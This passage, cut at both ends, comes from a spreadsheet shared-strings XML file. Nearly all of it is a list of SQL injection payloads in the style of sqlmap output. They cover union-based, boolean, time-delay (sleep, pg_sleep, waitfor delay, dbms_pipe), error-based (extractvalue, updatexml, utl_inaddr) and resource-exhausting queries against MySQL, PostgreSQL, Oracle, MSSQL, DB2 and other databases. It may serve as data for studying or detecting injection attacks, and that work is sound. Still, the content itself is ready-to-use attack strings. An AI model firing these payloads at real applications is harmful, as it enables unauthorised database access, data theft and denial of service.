    <t>1' )  where 9221 = 9221 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'bpml' where 7360 = 7360 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   ) ||'</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (  'wmoo' like 'wmoo</t>
  </si>
  <si>
    <t>1' )  and  ( 1414 = 4775 ) *4775 and  ( 'mlmw' = 'mlmw</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7812 = 7812 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 )  from dual ) </t>
  </si>
  <si>
    <t>1" where 2365 = 2365 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "oohx" like "oohx</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 9190 = 5059,1,1/0 ) </t>
  </si>
  <si>
    <t>-1438 where 6759 = 6759 union all select 6759,6759#</t>
  </si>
  <si>
    <t>1' )  where 7908 = 7908 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( 'eugs' = 'eugs</t>
  </si>
  <si>
    <t>1 )  as mtda where 3951 = 3951</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-2248'+ ( select wuow where 4421 = 4421 union all select 4421,4421,4421,4421,4421,4421--</t>
  </si>
  <si>
    <t>-8566" )  as hnch where 3418 = 3418 union all select 3418,3418,3418,3418,3418,3418,3418#</t>
  </si>
  <si>
    <t>1'  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( 'cjre' = 'cjre</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>-1219' )  or 5592 = 4835</t>
  </si>
  <si>
    <t>-6747" or 9323 = 9323#</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5#</t>
  </si>
  <si>
    <t>1" rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and "tbbk" like "tbbk</t>
  </si>
  <si>
    <t>-7416" where 7656 = 7656 order by 1--</t>
  </si>
  <si>
    <t>select case when 1892 = 3646 then 1 else null end--</t>
  </si>
  <si>
    <t>1"  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "jzsb" = "jzsb</t>
  </si>
  <si>
    <t>1  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( 9558 = 9558</t>
  </si>
  <si>
    <t>1" union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-8490  )  )   union all select 6910,6910,6910,6910,6910,6910#</t>
  </si>
  <si>
    <t>1"  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "lxue" like "lxue</t>
  </si>
  <si>
    <t>1" )  as gtpi where 8100 = 8100 and make_set ( 2678 = 9169,9169 ) --</t>
  </si>
  <si>
    <t>1"  )  )   )  rlike sleep ( 5 )  and   (  (   ( "eefg" = "eefg</t>
  </si>
  <si>
    <t>1 )  as oknr where 3228 = 3228</t>
  </si>
  <si>
    <t>1' )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and  ( 'jhlj' = 'jhlj</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and "cyrb" = "cyrb</t>
  </si>
  <si>
    <t>1 where 5691 = 5691 and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno ) --</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-5320 where 8051 = 8051 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr (</t>
  </si>
  <si>
    <t>1'|| ( select 'tvcy' where 5592 = 5592 order by 1#</t>
  </si>
  <si>
    <t>-2981  )  )   or  ( 8459 = 8459 ) *4906 and   (  (  4202 = 4202</t>
  </si>
  <si>
    <t>1'  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'xtdj' = 'xtdj</t>
  </si>
  <si>
    <t>1'|| ( select 'fwph' where 3791 = 3791</t>
  </si>
  <si>
    <t>1 )  where 7680 = 7680 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and  ( "ludp" like "ludp</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-7531' )  union all select 3072,3072,3072,3072,3072,3072,3072--</t>
  </si>
  <si>
    <t>1' )  as bihs where 4197 = 4197</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 2452 = 8999,1,1/0 ) </t>
  </si>
  <si>
    <t>1'  )  )   as xntz where 5801 = 5801 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-3637" or  ( 8459 = 8459 ) *4906</t>
  </si>
  <si>
    <t>1 )  where 2232 = 2232</t>
  </si>
  <si>
    <t>1' )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( 'rxxb' = 'rxxb</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) </t>
  </si>
  <si>
    <t>1" )  where 4567 = 4567 or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1" )  as buky where 7898 = 7898 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-8349 )  union all select 8126,8126#</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  'nbzf' like 'nbzf</t>
  </si>
  <si>
    <t>-5230" )  or elt ( 1032 = 1032,3623 )  and  ( "aivb" like "aivb</t>
  </si>
  <si>
    <t>1' and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'ulep' = 'ulep</t>
  </si>
  <si>
    <t>1 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) # msrb</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) # lwfs</t>
  </si>
  <si>
    <t>-3096' or 3821 = 5539 and 'zrth' = 'zrth</t>
  </si>
  <si>
    <t>1' and elt ( 1210 = 1210,sleep ( 5  )  )   and 'ioar' = 'ioar</t>
  </si>
  <si>
    <t>1'+ ( select 'vwzp' where 2729 = 2729 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>-3853" )  where 4626 = 4626 union all select 4626,4626,4626--</t>
  </si>
  <si>
    <t>1"  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  "dtfg" = "dtfg</t>
  </si>
  <si>
    <t>1 where 3354 = 3354</t>
  </si>
  <si>
    <t>-2027%" )  union all select 2048,2048,2048,2048,2048,2048,2048,2048#</t>
  </si>
  <si>
    <t>-2573  )  )   order by 1#</t>
  </si>
  <si>
    <t>1' )  where 3262 = 3262 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3-- uugg</t>
  </si>
  <si>
    <t>1" )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( "pqsp" = "pqsp</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) </t>
  </si>
  <si>
    <t>if ( 3490 = 4920 )  select 3490 else drop function hlzt--</t>
  </si>
  <si>
    <t>1" )  where 9861 = 9861</t>
  </si>
  <si>
    <t>if ( 3831 = 9321 )  select 3831 else drop function ybru--</t>
  </si>
  <si>
    <t>1"  )  )   as frsd where 6475 = 6475 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%"  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>-1891' in boolean mode )  union all select 6680,6680,6680,6680,6680,6680,6680,6680#</t>
  </si>
  <si>
    <t xml:space="preserve">1 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  </t>
  </si>
  <si>
    <t>1"  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "kcxw" = "kcxw</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and 'lckw' = 'lckw</t>
  </si>
  <si>
    <t>1" rlike  ( select  ( case when  ( 2724 = 4757 )  then 1 else 0x28 end  )  )   and "cmsa" = "cmsa</t>
  </si>
  <si>
    <t>1' or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) -- paxv</t>
  </si>
  <si>
    <t>-4373'+ ( select 'rlht' where 2285 = 2285 union all select 2285,2285,2285#</t>
  </si>
  <si>
    <t>1"  )  )   )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( "gimc" like "gimc</t>
  </si>
  <si>
    <t>1'  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  'wqme' = 'wqme</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  where 1363 = 1363</t>
  </si>
  <si>
    <t>select  ( case when  ( 5569 = 9390 )  then 5569 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>select case when 6229 = 2077 then 1 else null end--</t>
  </si>
  <si>
    <t>1  )  )   as nxdf where 1696 = 1696 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>-3955%'  )  )   union all select 7999,7999,7999,7999,7999,7999,7999,7999,7999#</t>
  </si>
  <si>
    <t>1" )  union all select null#</t>
  </si>
  <si>
    <t>1 )  as wust where 3884 = 3884 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-5026' or  ( 8459 = 8459 ) *4906 and 'uavj' like 'uavj</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and '%' = '</t>
  </si>
  <si>
    <t>1%'  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>-3501"  )  )   )  or  ( 6789 = 6990 ) *6990 and   (  (   ( "jnnc" like "jnnc</t>
  </si>
  <si>
    <t>1" where 7045 = 7045</t>
  </si>
  <si>
    <t>1'|| ( select 'noik' from dual where 9851 = 9851</t>
  </si>
  <si>
    <t>-9336' or 5641 = 9488#</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 6750 = 6750 )  then 1 else 6750* ( select 6750 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t>1  )  )   )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1'  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( 'jrpk' = 'jrpk</t>
  </si>
  <si>
    <t>1  )  )   as mlpf where 7425 = 7425</t>
  </si>
  <si>
    <t>-7794" )  union all select 3910,3910,3910,3910,3910,3910,3910,3910,3910,3910#</t>
  </si>
  <si>
    <t>1"  )  )   as rpxd where 4929 = 4929</t>
  </si>
  <si>
    <t>select  ( case when  ( 6434 = 3877 )  then 6434 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>-9958" )  as jzvq where 3741 = 3741 union all select 3741,3741,3741#</t>
  </si>
  <si>
    <t>1 )  and make_set ( 4593 = 7765,7765 )  and  ( 8517 = 8517</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'tmdj' like 'tmdj</t>
  </si>
  <si>
    <t>-7199'|| ( select 'ssty' where 5406 = 5406 order by 1#</t>
  </si>
  <si>
    <t>1" or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and "menm" like "menm</t>
  </si>
  <si>
    <t>1' and make_set ( 3445 = 5963,5963 )  and 'wjfw' = 'wjfw</t>
  </si>
  <si>
    <t>1" )  waitfor delay '0:0:5' and  ( "hhzy" like "hhzy</t>
  </si>
  <si>
    <t>1"  )  )   or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (  "ozvp" = "ozvp</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  'tpih' = 'tpih</t>
  </si>
  <si>
    <t>1"  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "xnsj" like "xnsj</t>
  </si>
  <si>
    <t>1  )  )   as sfan where 7176 = 7176 and 7017 = 7358</t>
  </si>
  <si>
    <t>1%" )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1"  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "mxnj" like "mxnj</t>
  </si>
  <si>
    <t>-6846%"  )  )   or  ( 8459 = 8459 ) *4906 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' )  as zxos where 2745 = 2745</t>
  </si>
  <si>
    <t>1' )  as mvai where 5856 = 5856 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>1  )  )   )  and sleep ( 5 )  and   (  (   ( 6618 = 6618</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual--</t>
  </si>
  <si>
    <t>1 )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-6200%'  )  )   or 8077 = 4661</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and 'fdgq' = 'fdgq</t>
  </si>
  <si>
    <t>1'+ ( select wgmn where 4368 = 4368 and 7859 = 6151 ) +'</t>
  </si>
  <si>
    <t>1" )  where 9285 = 9285 and 8506 = 8343#</t>
  </si>
  <si>
    <t>1  )  )   )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 6894 = 6087 )  then 1 else 6894* ( select 6894 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t>1'|| ( select 'rfjl' where 2476 = 2476 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  )  ||'</t>
  </si>
  <si>
    <t>1 )  where 4698 = 4698 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'jmao' where 3009 = 3009</t>
  </si>
  <si>
    <t>-9622' union all select 7208,7208,7208,7208#</t>
  </si>
  <si>
    <t>1' )  as ywtu where 3009 = 3009 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-1681%" union all select 8180,8180,8180,8180,8180,8180,8180,8180,8180,8180#</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq ) --</t>
  </si>
  <si>
    <t>1  )  )   )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null#</t>
  </si>
  <si>
    <t>1%' and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and '%' = '</t>
  </si>
  <si>
    <t>1" )  where 2758 = 2758 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-7940' )  union all select 6024--</t>
  </si>
  <si>
    <t>1" where 4808 = 4808 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-5910%'  )  )   )  union all select 5184,5184,5184,5184,5184,5184,5184,5184,5184,5184--</t>
  </si>
  <si>
    <t>-8491" where 6107 = 6107 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||ch</t>
  </si>
  <si>
    <t xml:space="preserve">-8007'  )  )   as bgpp where 9555 = 9555 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr </t>
  </si>
  <si>
    <t>-9384%" union all select 7031,7031,7031,7031,7031,7031,7031,7031,7031#</t>
  </si>
  <si>
    <t>-1339  )  )   )  union all select 2938,2938,2938,2938,2938,2938#</t>
  </si>
  <si>
    <t>1" )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and  ( "mrsl" = "mrsl</t>
  </si>
  <si>
    <t>1'  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( 'dhqz' = 'dhqz</t>
  </si>
  <si>
    <t>1" where 4345 = 4345 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>-5207" where 2050 = 2050 union all select 2050,2050,2050,2050,2050,2050,2050--</t>
  </si>
  <si>
    <t>-4056"  )  )   )  union all select 4363,4363,4363,4363,4363,4363,4363,4363#</t>
  </si>
  <si>
    <t>-6222  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>1'|| ( select 'jpso' from dual where 9357 = 9357 or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )    )  )  ||'</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (  'mmvf' like 'mmvf</t>
  </si>
  <si>
    <t>1" where 8727 = 8727</t>
  </si>
  <si>
    <t xml:space="preserve">1,exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 7759 = 7759,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  'qgov' = 'qgov</t>
  </si>
  <si>
    <t>1'+ ( select 'iyvn' where 9358 = 9358 or elt ( 6272 = 6272,sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t>1"  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "bxcb" like "bxcb</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (   ( 5432 = 5432</t>
  </si>
  <si>
    <t>1%' or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'ersu' where 4123 = 4123 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>1"  )  )   as qvyu where 5962 = 5962 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>select case when 6420 = 7941 then 1 else null end--</t>
  </si>
  <si>
    <t>1" and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and "twmy" = "twmy</t>
  </si>
  <si>
    <t>-6514  )  )   as pbgg where 6841 = 6841 union all select 6841,6841,6841,6841--</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( 'xngr' = 'xngr</t>
  </si>
  <si>
    <t>1%' and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and "pxix" = "pxix</t>
  </si>
  <si>
    <t>-1963 union all select 6831,6831,6831,6831,6831,6831,6831,6831#</t>
  </si>
  <si>
    <t>1" )  where 2834 = 2834  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>1' order by 1#</t>
  </si>
  <si>
    <t>-2548"  )  )   )  or 5107 = 8049--</t>
  </si>
  <si>
    <t>1 )  as ghew where 6441 = 6441 union all select null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) </t>
  </si>
  <si>
    <t>1" )  as rnte where 6517 = 6517 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' where 4795 = 4795 and 4595 = 4595#</t>
  </si>
  <si>
    <t>1 )  as qgsb where 7600 = 7600 and 2006 = 2006</t>
  </si>
  <si>
    <t>1" )  as rnjx where 2679 = 2679 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>-6940' )  union all select 3042,3042,3042,3042,3042#</t>
  </si>
  <si>
    <t>-8636"  )  )   )  union all select 1821,1821,1821,1821,1821,1821,1821,1821,1821,1821--</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1' )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'lnte' = 'lnte</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-9286"  )  )   as mfxl where 9348 = 9348 union all select 9348#</t>
  </si>
  <si>
